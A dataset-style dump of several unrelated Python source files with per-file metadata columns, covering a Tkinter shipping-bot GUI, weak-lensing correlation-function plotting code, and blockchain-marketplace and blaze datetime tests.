| 0.641026
| 0.105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119565
| 276
| 12
| 103
| 23
| 0.823045
| 0
| 0
| 0
| 0
| 0
| 0.129964
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.285714
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c7b515ae39c770bf0370e05e2c3d7ec44f6e7fd
| 2,687
|
py
|
Python
|
src/components/Bot.py
|
Vini-Dev-Py/Bot-ML
|
f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3
|
[
"MIT"
] | null | null | null |
src/components/Bot.py
|
Vini-Dev-Py/Bot-ML
|
f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3
|
[
"MIT"
] | null | null | null |
src/components/Bot.py
|
Vini-Dev-Py/Bot-ML
|
f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import random
import datetime
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
import functools
# import pathlib
from conflista import Bot
from salvacode import Salvar
from escreve import escreve
from geraqrcode import Gerar
date = datetime.date.today()
jan = Tk()
jan.title("Bot Mercado Envios")
jan.geometry("800x300")
jan.configure(background="#2b2b2b")
jan.resizable(width=False, height=False)
jan.iconbitmap(default="C:\programas\Programaรงรขo\GitHub\Bot-ML\Bot-ML\images\LogoIcon.ico")
logo = PhotoImage(file="C:\programas\Programaรงรขo\GitHub\Bot-ML\Bot-ML\images\logo.png")
messagebox.showinfo("Hello World !", "Seja Bem-Vindo ")
LeftFrame = Frame(jan, width=220, height=500, bg="#FF8C00", relief="raise")
LeftFrame.pack(side=LEFT)
RightFrame = Frame(jan, width=575, height=500, bg="#4f4f4f", relief="raise")
RightFrame.pack(side=RIGHT)
Caixas = Label(RightFrame, text="Total De Caixas:", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Caixas.place(x=5, y=10)
CaixasEntry = ttk.Entry(RightFrame, width=53)
CaixasEntry.place(x=230, y=25)
Lote = Label(RightFrame, text="Nยบ Do Lote:", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Lote.place(x=5, y=75)
LoteEntry = ttk.Entry(RightFrame, width=53)
LoteEntry.place(x=230, y=90)
Valores = Label(RightFrame, text="Codigos Lidos: ", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Valores.place(x=5, y=140)
ValoresEntry = Text(RightFrame, width=40, height=5)
# ValoresEntry.config(state=state)
ValoresEntry.place(x=230, y=155)
# file = open(f'C:\programas\Programaรงรขo\GitHub\{date} QR-BarCode-Unity.txt', 'w+')
# file = open(f'{date} QR-BarCode-Unity', 'w+')
def PegaLista():
try:
Caixas = CaixasEntry.get()
Valores = ValoresEntry.get('1.0', END)
QuantCaixas = int(Caixas)
Lista = Valores
# Lista = Lista.replace(',+',',')
Lista = Lista.split(',+')
QuantLista = len(Lista)
if QuantCaixas == QuantLista:
try:
escreve(Bot, Lista, date, Salvar)
Gerar(Lista, LoteEntry, contador=0)
except:
messagebox.showerror("Erro !", "Falha Na Funรงรฃo (escreve)")
else:
messagebox.showerror("Erro !", "Seu Total de Caixas Nรฃo Bate Com Seus Codigos !")
except:
messagebox.showerror("Erro !", "Por Favor Coloque Os Valores Nos Campos !")
ConfButton = ttk.Button(RightFrame, text="Adicionar Lista", width= 30, command=PegaLista)
ConfButton.place(x=5, y=190)
jan.mainloop()
| 26.60396
| 106
| 0.671381
| 352
| 2,687
| 5.125
| 0.443182
| 0.023282
| 0.015521
| 0.017738
| 0.131929
| 0.104213
| 0.104213
| 0.104213
| 0.047672
| 0
| 0
| 0.03813
| 0.180127
| 2,687
| 101
| 107
| 26.60396
| 0.780754
| 0.077038
| 0
| 0.067797
| 0
| 0.033898
| 0.194343
| 0.050909
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016949
| false
| 0
| 0.220339
| 0
| 0.237288
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c80ebcea041e63107d9067c90a11c330c458c26
| 503
|
py
|
Python
|
Triple predictor P3.6/generate_lines.py
|
oligogenic/DIDA_SSL
|
cbf61892bfde999eadf31db918833f6c75a5c9f3
|
[
"MIT"
] | 1
|
2018-07-19T10:34:46.000Z
|
2018-07-19T10:34:46.000Z
|
Triple predictor P3.6/generate_lines.py
|
oligogenic/DIDA_SSL
|
cbf61892bfde999eadf31db918833f6c75a5c9f3
|
[
"MIT"
] | null | null | null |
Triple predictor P3.6/generate_lines.py
|
oligogenic/DIDA_SSL
|
cbf61892bfde999eadf31db918833f6c75a5c9f3
|
[
"MIT"
] | null | null | null |
def binary(n):
if n not in binary.memoize:
binary.memoize[n] = binary(n//2) + str(n % 2)
return binary.memoize[n]
binary.memoize = {0: '0', 1: '1'}
def get_binary_l(n, l):
bin_str = binary(n)
return (l - len(bin_str))*'0' + bin_str
n_f = 9
with open('command_lines.txt', 'w') as out:
for i in range(2**n_f):
out.write('/home/nversbra/anaconda3/envs/py36/bin/python random_forest.py dida_posey_to_predict.csv 100 50 1-1-1 %s\n' % get_binary_l(i, n_f))
| 33.533333
| 151
| 0.61829
| 94
| 503
| 3.148936
| 0.5
| 0.175676
| 0.094595
| 0.135135
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050633
| 0.214712
| 503
| 14
| 152
| 35.928571
| 0.698734
| 0
| 0
| 0
| 0
| 0.083333
| 0.259714
| 0.143149
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c81582355ba3220bcb59a6354b57fa7be7a46e7
| 17,422
|
py
|
Python
|
angular_binning/snr_per_bin.py
|
robinupham/angular_binning
|
da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87
|
[
"MIT"
] | null | null | null |
angular_binning/snr_per_bin.py
|
robinupham/angular_binning
|
da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87
|
[
"MIT"
] | null | null | null |
angular_binning/snr_per_bin.py
|
robinupham/angular_binning
|
da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87
|
[
"MIT"
] | null | null | null |
"""
Functions for plotting the signal to noise per angular bin.
"""
import math
import os.path
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import angular_binning.like_cf_gauss as like_cf
DEG_TO_RAD = math.pi / 180.0
def plot_cl_cf(diag_she_cl_path, she_nl_path, lmin, lmax, theta_min, theta_max, n_theta_bin, survey_area_sqdeg,
gals_per_sqarcmin, sigma_e, l_extrap_to=60000, plot_save_dir=None):
"""
Produce plots of signal-to-noise per element for both the unbinned power spectrum and the binned correlation
function, using data produced with ``param_grids.load_diagonal_shear_cl``.
Args:
diag_she_cl_path (str): Path to output of ``param_grids.load_diagonal_shear_cl``.
she_nl_path (str): Path to shear noise power spectrum as a text file.
lmin (int): Minimum l.
lmax (int): Maximum l.
theta_min (float): Minimum theta.
theta_max (float): Maximum theta.
n_theta_bin (int): Number of theta bins.
survey_area_sqdeg (float): Survey area in square degrees, used to calculate the noise variance for the
correlation function.
gals_per_sqarcmin (float): Average number of galaxies per square arcminute per redshift bin, used to calculate
the noise variance for the correlation function.
sigma_e (float): Intrinsic ellipticity dispersion per component, used to calculate the noise variance for the
correlation function.
l_extrap_to (int, optional): The power spectrum is extrapolated to this l prior to the Cl-to-CF transform for
stability, using a l(l+1)-weighted linear extrapolation. Default 60000.
plot_save_dir (str, optional): Directory to save the two plots into, if supplied. If not supplied, plots are
displayed.
"""
# Load parameters and power spectra
with np.load(diag_she_cl_path) as data:
w0 = data['w0']
wa = data['wa']
cls_nonoise = data['shear_cl_bin_1_1']
# Add noise
n_ell = lmax - lmin + 1
nl = np.loadtxt(she_nl_path, max_rows=n_ell)
cls_ = cls_nonoise + nl
# Do some consistency checks
n_samp = len(w0)
assert w0.shape == (n_samp,)
assert wa.shape == (n_samp,)
assert cls_.shape == (n_samp, n_ell)
# Identify fiducial Cls
fid_idx = np.squeeze(np.argwhere(np.isclose(w0, -1) & np.isclose(wa, 0)))
fid_cl = cls_[fid_idx, :]
ell = np.arange(lmin, lmax + 1)
fid_cl_err = np.sqrt(2 * fid_cl ** 2 / (2 * ell + 1))
# Calculate distance from (-1, 0) with a direction (bottom left being negative)
dist = np.sqrt((w0 - -1) ** 2 + (wa - 0) ** 2) * np.sign(wa)
# Convert distance to units of sigma using the fact that we have 21 points inside +/- 9 sig
# (on the w0-wa posterior from lmax 2000 power spectrum)
onesig = np.mean(np.diff(dist)) * (21 - 1) / 18
dist_sigma = dist / onesig
# Use a diverging colour map over this range
max_dist_sigma = np.amax(np.abs(dist_sigma))
norm = matplotlib.colors.Normalize(-max_dist_sigma, max_dist_sigma)
colour = matplotlib.cm.ScalarMappable(norm, cmap='Spectral')
# Prepare plot
plt.rcParams.update({'font.size': 13})
fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.09, right=.99, bottom=.07, top=.97, hspace=0)
# Plot all power spectra and the difference from the fiducial model
cl_fac = ell * (ell + 1) / (2 * np.pi)
for cl, dist_sig in zip(cls_, dist_sigma):
ax[0].plot(ell, cl_fac * cl, alpha=.5, color=colour.to_rgba(dist_sig))
ax[1].plot(ell, (cl - fid_cl) / fid_cl_err, alpha=.5, color=colour.to_rgba(dist_sig))
# Add a few cosmic variance error bars
err_ell = np.array([500, 1000, 1500, 2000])
err_ell_idx = err_ell - lmin
ax[0].errorbar(err_ell, cl_fac[err_ell_idx] * fid_cl[err_ell_idx],
yerr=(cl_fac[err_ell_idx] * 0.5 * fid_cl_err[err_ell_idx]), lw=2, c='black', zorder=5, capsize=5,
ls='None', label=r'Cosmic variance + noise $\sqrt{Var (C_\ell)}$')
# Labels, legend and colour bar
ax[1].set_xlabel(r'$\ell$')
ax[0].set_ylabel(r'$C_\ell \times \ell (\ell + 1) ~ / ~ 2 \pi$')
ax[1].set_ylabel(r'$(C_\ell - C_\ell^\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(C_\ell)}$')
ax[0].ticklabel_format(axis='y', style='sci', scilimits=(0, 0))
fig.align_ylabels()
ax[0].legend(frameon=False, title='Bin 1 shear')
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n', rotation=-90,
labelpad=25)
if plot_save_dir is not None:
plot_save_path = os.path.join(plot_save_dir, 'cl_perl.pdf')
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
# Calculate theta range
theta_bin_edges = np.logspace(np.log10(theta_min), np.log10(theta_max), n_theta_bin + 1)
# Generate Cl -> binned CF matrix (for xi_plus)
_, cl2cf_22plus, _ = like_cf.get_cl2cf_matrices(theta_bin_edges, lmin, l_extrap_to)
# Extrapolate fiducial power spectrum up to l_extrap_to and zero it below lmax
fid_cl = cls_nonoise[fid_idx, :]
extrap_mat = get_extrap_mat(lmin, lmax, l_extrap_to)
fid_cl_extrap = extrap_mat @ fid_cl
# Transform it with transmat to obtain stabilisation vector
stabl_vec = cl2cf_22plus @ fid_cl_extrap
# Now trim transmat to lmax
cl2cf_22plus = cl2cf_22plus[:, :(lmax - lmin + 1)]
# Obtain fiducial CF
fid_cf = cl2cf_22plus @ fid_cl + stabl_vec
# Calculate error on fiducial CF, including noise
fid_cl_var = 2 * fid_cl ** 2 / (2 * ell + 1)
fid_cf_cov_nonoise = np.einsum('il,jl,l->ij', cl2cf_22plus, cl2cf_22plus, fid_cl_var)
# Noise contribution
survey_area_sterad = survey_area_sqdeg * (DEG_TO_RAD ** 2)
gals_per_sterad = gals_per_sqarcmin * (60 / DEG_TO_RAD) ** 2
cos_theta = np.cos(theta_bin_edges)
bin_area_new = 2 * np.pi * -1 * np.diff(cos_theta)
npairs = 0.5 * survey_area_sterad * bin_area_new * (gals_per_sterad ** 2) # Friedrich et al. eq 65
fid_cf_noise_var = 2 * sigma_e ** 4 / npairs
fid_cf_err = np.sqrt(np.diag(fid_cf_cov_nonoise) + fid_cf_noise_var)
# Apply trimmed transmat to each power spectrum and add stabilisation vector, and plot
fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.09, right=.99, bottom=.07, top=.97, hspace=0)
bin_edges_deg = np.degrees(theta_bin_edges)
bin_centres_deg = bin_edges_deg[:-1] + 0.5 * np.diff(bin_edges_deg)
for cl, dist_sig in zip(cls_nonoise, dist_sigma):
cf = cl2cf_22plus @ cl + stabl_vec
cf_diff = (cf - fid_cf) / fid_cf_err
line_args = {'alpha': .5, 'color': colour.to_rgba(dist_sig)}
ax[0].step(bin_edges_deg, np.pad(cf, (0, 1), mode='edge'), where='post', **line_args)
ax[1].step(bin_edges_deg, np.pad(cf_diff, (0, 1), mode='edge'), where='post', **line_args)
# Add error bars
bin_centres_deg = bin_edges_deg[:-1] + 0.5 * np.diff(bin_edges_deg)
ax[0].errorbar(bin_centres_deg, fid_cf, yerr=(0.5 * fid_cf_err), lw=2, c='black', zorder=5, capsize=5,
ls='None', label=r'Cosmic variance + noise $\sqrt{Var (\xi+)}$')
# Labels, legend and colour bar
plt.xscale('log')
ax[1].set_xlabel(r'$\theta$ (deg)')
ax[0].set_ylabel(r'$\xi^+ (\theta)$')
ax[1].set_ylabel(r'$(\xi^+ - \xi^+_\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(\xi^+)}$')
fig.align_ylabels()
ax[0].legend(frameon=False, title='Bin 1 shear')
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n(from power spectrum)', rotation=-90,
labelpad=25)
if plot_save_dir is not None:
plot_save_path = os.path.join(plot_save_dir, 'cf_perbin.pdf')
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
def plot_cf_nbin(diag_she_cl_path, lmin, lmax, theta_min, theta_max, n_bin_1, n_bin_2, survey_area_sqdeg,
gals_per_sqarcmin, sigma_e, l_extrap_to=60000, plot_save_path=None):
"""
Plots signal-to-noise per bin for the full-sky correlation function for two numbers of bins side-by-side, using data
produced with ``param_grids.load_diagonal_shear_cl``.
Args:
diag_she_cl_path (str): Path to output of ``param_grids.load_diagonal_shear_cl``.
lmin (int): Minimum l.
lmax (int): Maximum l.
theta_min (float): Minimum theta.
theta_max (float): Maximum theta.
n_bin_1 (int): Number of theta bins in the left panel.
n_bin_2 (int): Number of theta bins in the right panel.
survey_area_sqdeg (float): Survey area in square degrees.
gals_per_sqarcmin (float): Average number of galaxies per square arcminute per redshift bin.
sigma_e (float): Intrinsic ellipticity dispersion per component.
l_extrap_to (int, optional): The power spectrum is extrapolated to this l prior to the Cl-to-CF transform for
stability, using a l(l+1)-weighted linear extrapolation. Default 60000.
plot_save_path (str, optional): Path to save the plot, if supplied. If not supplied, plot is displayed.
"""
# Load parameters and power spectra
with np.load(diag_she_cl_path) as data:
w0 = data['w0']
wa = data['wa']
cls_nonoise = data['shear_cl_bin_1_1']
# Do some consistency checks
n_samp = len(w0)
assert w0.shape == (n_samp,)
assert wa.shape == (n_samp,)
# Identify fiducial Cls
fid_idx = np.squeeze(np.argwhere(np.isclose(w0, -1) & np.isclose(wa, 0)))
ell = np.arange(lmin, lmax + 1)
# Calculate distance from (-1, 0) with a direction (bottom left being negative)
dist = np.sqrt((w0 - -1) ** 2 + (wa - 0) ** 2) * np.sign(wa)
# Convert distance to units of sigma using the fact that we have 21 points inside +/- 9 sig
# (on the w0-wa posterior from lmax 2000 power spectrum)
onesig = np.mean(np.diff(dist)) * (21 - 1) / 18
dist_sigma = dist / onesig
# Use a diverging colour map over this range
max_dist_sigma = np.amax(np.abs(dist_sigma))
norm = matplotlib.colors.Normalize(-max_dist_sigma, max_dist_sigma)
colour = matplotlib.cm.ScalarMappable(norm, cmap='Spectral')
# Calculate theta range
theta_bin_edges_1 = np.logspace(np.log10(theta_min), np.log10(theta_max), n_bin_1 + 1)
theta_bin_edges_2 = np.logspace(np.log10(theta_min), np.log10(theta_max), n_bin_2 + 1)
# Generate Cl -> binned CF matrix (for xi_plus)
_, cl2cf_22plus_1, _ = like_cf.get_cl2cf_matrices(theta_bin_edges_1, lmin, l_extrap_to)
_, cl2cf_22plus_2, _ = like_cf.get_cl2cf_matrices(theta_bin_edges_2, lmin, l_extrap_to)
# Extrapolate fiducial power spectrum up to l_extrap_to and zero it below lmax
fid_cl = cls_nonoise[fid_idx, :]
extrap_mat = get_extrap_mat(lmin, lmax, l_extrap_to)
fid_cl_extrap = extrap_mat @ fid_cl
# Transform it with transmat to obtain stabilisation vector
stabl_vec_1 = cl2cf_22plus_1 @ fid_cl_extrap
stabl_vec_2 = cl2cf_22plus_2 @ fid_cl_extrap
# Now trim transmat to lmax
cl2cf_22plus_1 = cl2cf_22plus_1[:, :(lmax - lmin + 1)]
cl2cf_22plus_2 = cl2cf_22plus_2[:, :(lmax - lmin + 1)]
# Obtain fiducial CF
fid_cf_1 = cl2cf_22plus_1 @ fid_cl + stabl_vec_1
fid_cf_2 = cl2cf_22plus_2 @ fid_cl + stabl_vec_2
# Calculate error on fiducial CF, including noise
fid_cl_var = 2 * fid_cl ** 2 / (2 * ell + 1)
fid_cf_cov_nonoise_1 = np.einsum('il,jl,l->ij', cl2cf_22plus_1, cl2cf_22plus_1, fid_cl_var)
fid_cf_cov_nonoise_2 = np.einsum('il,jl,l->ij', cl2cf_22plus_2, cl2cf_22plus_2, fid_cl_var)
# Noise contribution
survey_area_sterad = survey_area_sqdeg * (DEG_TO_RAD ** 2)
gals_per_sterad = gals_per_sqarcmin * (60 / DEG_TO_RAD) ** 2
cos_theta_1 = np.cos(theta_bin_edges_1)
cos_theta_2 = np.cos(theta_bin_edges_2)
bin_area_1 = 2 * np.pi * -1 * np.diff(cos_theta_1)
bin_area_2 = 2 * np.pi * -1 * np.diff(cos_theta_2)
npairs_1 = 0.5 * survey_area_sterad * bin_area_1 * (gals_per_sterad ** 2) # Friedrich et al. eq 65
npairs_2 = 0.5 * survey_area_sterad * bin_area_2 * (gals_per_sterad ** 2)
fid_cf_noise_var_1 = 2 * sigma_e ** 4 / npairs_1
fid_cf_noise_var_2 = 2 * sigma_e ** 4 / npairs_2
fid_cf_err_1 = np.sqrt(np.diag(fid_cf_cov_nonoise_1) + fid_cf_noise_var_1)
fid_cf_err_2 = np.sqrt(np.diag(fid_cf_cov_nonoise_2) + fid_cf_noise_var_2)
# Prepare plot
plt.rcParams.update({'font.size': 13})
fig, ax = plt.subplots(nrows=2, ncols=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.07, right=1, bottom=.07, top=.97, hspace=0, wspace=.12)
# Apply trimmed transmat to each power spectrum and add stabilisation vector, and plot
bin_edges_deg_1 = np.degrees(theta_bin_edges_1)
bin_edges_deg_2 = np.degrees(theta_bin_edges_2)
for cl, dist_sig in zip(cls_nonoise, dist_sigma):
cf_1 = cl2cf_22plus_1 @ cl + stabl_vec_1
cf_2 = cl2cf_22plus_2 @ cl + stabl_vec_2
cf_diff_1 = (cf_1 - fid_cf_1) / fid_cf_err_1
cf_diff_2 = (cf_2 - fid_cf_2) / fid_cf_err_2
step_args = {'where': 'post', 'alpha': .5, 'color': colour.to_rgba(dist_sig)}
ax[0, 0].step(bin_edges_deg_1, np.pad(cf_1, (0, 1), mode='edge'), **step_args)
ax[0, 1].step(bin_edges_deg_2, np.pad(cf_2, (0, 1), mode='edge'), **step_args)
ax[1, 0].step(bin_edges_deg_1, np.pad(cf_diff_1, (0, 1), mode='edge'), **step_args)
ax[1, 1].step(bin_edges_deg_2, np.pad(cf_diff_2, (0, 1), mode='edge'), **step_args)
# Add error bars
log_bin_edges_deg_1 = np.log(bin_edges_deg_1)
log_bin_edges_deg_2 = np.log(bin_edges_deg_2)
bin_log_centres_deg_1 = np.exp(log_bin_edges_deg_1[:-1] + 0.5 * np.diff(log_bin_edges_deg_1))
bin_log_centres_deg_2 = np.exp(log_bin_edges_deg_2[:-1] + 0.5 * np.diff(log_bin_edges_deg_2))
error_args = {'lw': 2, 'c': 'black', 'zorder': 5, 'capsize': 5, 'ls': 'None',
'label': r'Cosmic variance + noise $\sqrt{Var (\xi+)}$'}
ax[0, 0].errorbar(bin_log_centres_deg_1, fid_cf_1, yerr=(0.5 * fid_cf_err_1), **error_args)
ax[0, 1].errorbar(bin_log_centres_deg_2, fid_cf_2, yerr=(0.5 * fid_cf_err_2), **error_args)
# Log scale and axis labels
plt.xscale('log')
ax[1, 0].set_xlabel(r'$\theta$ (deg)')
ax[1, 1].set_xlabel(r'$\theta$ (deg)')
ax[0, 0].set_ylabel(r'$\xi^+ (\theta)$')
ax[1, 0].set_ylabel(r'$(\xi^+ - \xi^+_\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(\xi^+)}$')
fig.align_ylabels()
# Panel labels
annot_args = {'xy': (.95, .95), 'xycoords': 'axes fraction', 'ha': 'right', 'va': 'top', 'fontsize': 14}
ax[0, 0].annotate(f'{n_bin_1} $\\theta$ bin{"s" if n_bin_1 > 1 else ""}', **annot_args)
ax[0, 1].annotate(f'{n_bin_2} $\\theta$ bin{"s" if n_bin_2 > 1 else ""}', **annot_args)
# Colour bar
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n(from power spectrum)', rotation=-90,
labelpad=25)
if plot_save_path is not None:
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
def get_extrap_mat(lmin, lmax_in, l_extrap_to):
"""
Generate the power spectrum extrapolation matrix, which is used to extrapolate the power spectrum to high l
to stabilise the Cl-to-CF transform.
This matrix should be (pre-)multiplied by the fiducial power spectrum, then all (pre-)multiplied by the Cl-to-CF
transformation matrix, to produce a 'stabilisation vector' which can be added to any correlation function vector to
stabilise it. Generally the same stabilisation vector should be used for all points in parameter space, to avoid
biases. Note that the extrapolation matrix zeros all power below lmax_in, i.e. it does not give a concatenation of
the original power spectrum and the extrapolated section, but just solely the extrapolated section.
The extrapolation is linear with an l(l+1) weighting, achieved using a block matrix. See extrapolation_equations.pdf
for the derivation of its elements.
Args:
lmin (int): Minimum l in the power spectrum.
lmax_in (int): Maximum l prior to extrapolation.
l_extrap_to (int): Maximum l to which to extrapolate.
Returns:
2D numpy array: Extrapolation matrix.
"""
zero_top = np.zeros((lmax_in - lmin + 1, lmax_in - lmin + 1))
zero_bottom = np.zeros((l_extrap_to - lmax_in, lmax_in - lmin + 1 - 2))
ell_extrap = np.arange(lmax_in + 1, l_extrap_to + 1)
penul_col = (-ell_extrap + lmax_in) * lmax_in * (lmax_in - 1) / (ell_extrap * (ell_extrap + 1))
final_col = (ell_extrap - lmax_in + 1) * lmax_in * (lmax_in + 1) / (ell_extrap * (ell_extrap + 1))
extrap_mat = np.block([[zero_top], [zero_bottom, penul_col[:, np.newaxis], final_col[:, np.newaxis]]])
return extrap_mat
| 47.862637
| 120
| 0.662438
| 2,852
| 17,422
| 3.787868
| 0.143759
| 0.024438
| 0.021383
| 0.009997
| 0.735722
| 0.662131
| 0.626215
| 0.60585
| 0.533555
| 0.503379
| 0
| 0.038998
| 0.21404
| 17,422
| 363
| 121
| 47.99449
| 0.749945
| 0.312421
| 0
| 0.415385
| 0
| 0.015385
| 0.095817
| 0.007015
| 0
| 0
| 0
| 0
| 0.025641
| 1
| 0.015385
| false
| 0
| 0.030769
| 0
| 0.051282
| 0.015385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c821672ff666bf16f14e39715a6449abc332ecc
| 1,182
|
py
|
Python
|
tests/integration/test_use_cases/test_18_confirm_purchase.py
|
datacraft-dsc/starfish-py
|
95ff24410f056e8e2d313c3af97439fe003e294a
|
[
"Apache-2.0"
] | 4
|
2019-02-08T03:47:36.000Z
|
2019-10-17T21:45:23.000Z
|
tests/integration/test_use_cases/test_18_confirm_purchase.py
|
datacraft-dsc/starfish-py
|
95ff24410f056e8e2d313c3af97439fe003e294a
|
[
"Apache-2.0"
] | 81
|
2019-02-09T01:01:51.000Z
|
2020-07-01T08:35:07.000Z
|
tests/integration/test_use_cases/test_18_confirm_purchase.py
|
oceanprotocol/ocean-py
|
318ad0de2519e61d0a301c040a48d1839cd82425
|
[
"Apache-2.0"
] | 1
|
2021-01-28T12:14:03.000Z
|
2021-01-28T12:14:03.000Z
|
"""
test_18_confirm_purchase
As a developer building a service provider Agent for Ocean,
I need a way to confirm if an Asset has been sucessfully puchased so that
I can determine whether to serve the asset to a given requestor
"""
import secrets
import logging
import json
from starfish.asset import DataAsset
def test_18_confirm_purchase(resources, config, remote_agent_surfer, convex_accounts):
purchaser_account = convex_accounts
test_data = secrets.token_bytes(1024)
asset_data = DataAsset.create('TestAsset', test_data)
asset = remote_agent_surfer.register_asset(asset_data)
assert(asset)
listing = remote_agent_surfer.create_listing(resources.listing_data, asset.did)
listing.set_published(True)
logging.debug("confirm_purchase for listingid: " + listing.listing_id)
response = remote_agent_surfer.update_listing(listing)
logging.debug("update_listing response: " + str(response))
assert(response)
status = 'ordered'
purchase = remote_agent_surfer.purchase_asset(listing, purchaser_account, None, status)
assert(purchase['listingid'] == listing.listing_id)
assert(purchase['status'] == status)
| 35.818182
| 91
| 0.764805
| 154
| 1,182
| 5.642857
| 0.461039
| 0.063291
| 0.097814
| 0.048331
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008032
| 0.15736
| 1,182
| 32
| 92
| 36.9375
| 0.864458
| 0.188663
| 0
| 0
| 0
| 0
| 0.094218
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.05
| false
| 0
| 0.2
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c8705d494d8a3a52f621df0705a17180cb44780
| 1,230
|
py
|
Python
|
blaze/expr/tests/test_datetime.py
|
vitan/blaze
|
0cddb630ad1cf6be3967943337529adafa006ef5
|
[
"BSD-3-Clause"
] | 1
|
2015-11-06T00:46:56.000Z
|
2015-11-06T00:46:56.000Z
|
blaze/expr/tests/test_datetime.py
|
vitan/blaze
|
0cddb630ad1cf6be3967943337529adafa006ef5
|
[
"BSD-3-Clause"
] | null | null | null |
blaze/expr/tests/test_datetime.py
|
vitan/blaze
|
0cddb630ad1cf6be3967943337529adafa006ef5
|
[
"BSD-3-Clause"
] | null | null | null |
from blaze.expr import TableSymbol
from blaze.expr.datetime import isdatelike
from blaze.compatibility import builtins
from datashape import dshape
import pytest
def test_datetime_dshape():
t = TableSymbol('t', '5 * {name: string, when: datetime}')
assert t.when.day.dshape == dshape('5 * int32')
assert t.when.date.dshape == dshape('5 * date')
def test_date_attribute():
t = TableSymbol('t', '{name: string, when: datetime}')
expr = t.when.day
assert eval(str(expr)).isidentical(expr)
def test_invalid_date_attribute():
t = TableSymbol('t', '{name: string, when: datetime}')
with pytest.raises(AttributeError):
t.name.day
def test_date_attribute_completion():
t = TableSymbol('t', '{name: string, when: datetime}')
assert 'day' in dir(t.when)
assert 'day' not in dir(t.name)
assert not builtins.all([x.startswith('__') and x.endswith('__')
for x in dir(t.name)])
def test_datetime_attribute_name():
t = TableSymbol('t', '{name: string, when: datetime}')
assert 'when' in t.when.day._name
def test_isdatelike():
assert not isdatelike('int32')
assert isdatelike('?date')
assert not isdatelike('{is_outdated: bool}')
| 29.285714
| 68
| 0.669919
| 165
| 1,230
| 4.872727
| 0.266667
| 0.043532
| 0.080846
| 0.136816
| 0.256219
| 0.221393
| 0.221393
| 0.221393
| 0.119403
| 0
| 0
| 0.007021
| 0.189431
| 1,230
| 41
| 69
| 30
| 0.799398
| 0
| 0
| 0.133333
| 0
| 0
| 0.178049
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.2
| false
| 0
| 0.166667
| 0
| 0.366667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
